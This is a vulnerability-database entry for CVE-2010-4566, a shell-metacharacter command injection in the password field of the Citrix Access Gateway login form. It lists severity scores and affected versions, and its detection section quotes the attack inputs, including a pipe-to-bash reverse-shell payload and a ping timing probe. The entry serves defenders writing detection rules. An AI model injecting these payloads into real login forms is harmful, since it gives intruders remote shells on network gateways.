cbcvebase.
CVE-2010-4566
published 2011-01-14

CVE-2010-4566: The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9.2-49.8 and earlier, and the NTLM authentication…

PriorityP274critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
27.79%
97.8th percentile
The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9.2-49.8 and earlier, and the NTLM authentication component in Access Gateway Standard and Advanced Editions before Access Gateway 5.0, allows attackers to execute arbitrary commands via shell metacharacters in the password field.

Affected

20 ranges
VendorProductVersion rangeFixed in
citrixaccess_gateway<= 9.2-49.8
citrixaccess_gateway
citrixaccess_gateway
citrixaccess_gateway
citrixaccess_gateway
citrixaccess_gateway
citrixaccess_gateway
citrixaccess_gateway
citrixaccess_gateway
citrixaccess_gateway
citrixaccess_gateway
citrixaccess_gateway
citrixaccess_gateway
citrixcitrix_adm
citrixcitrix_hypervisor
citrixcitrix_virtual_apps_and_desktops
citrixendpoint_management
citrixnetscaler_adc
citrixnetscaler_gateway
citrixxenserver

Detection & IOCsextracted from sources · hover to see the quote

url/
command| bash -i >& /dev/tcp/>/> 0>&1 &
command| ping -c 10 >
commandping -c 10 127.0.0.1
path/usr/local/samba/bin/samedit
path/tmp/samedit-samuser-stdout.50474096
cookieSESSION_TOKEN=1208473755272-1381414381
processntlm_authenticator
  • Detect shell metacharacter injection in the password field of the web authentication POST request. Look for pipe characters ('|') or ampersands ('&') in the password parameter submitted to the login endpoint.
  • Monitor for the POST body pattern containing 'SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit' as a signature of exploit module activity against the Citrix Access Gateway login endpoint.
  • Detect timing-based probing: an attacker may inject '| ping -c 10 127.0.0.1' into the password field, causing a ~10-second delay in the authentication response that can be used as a vulnerability check.
  • Monitor process execution on the Access Gateway for 'sh -c /usr/local/samba/bin/samedit' spawned by the ntlm_authenticator process, especially with unusual or injected arguments.
  • Alert on outbound TCP connections from the Access Gateway process (vpnadmin) to unexpected external hosts, which may indicate a reverse bash shell established via the injected payload '| bash -i >& /dev/tcp/>/> 0>&1 &'.
  • ·The vulnerability is only exploitable when the legacy NT4/NTLM authentication module (ntlm_authenticator) is enabled. Deployments not using this authentication type are not affected.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.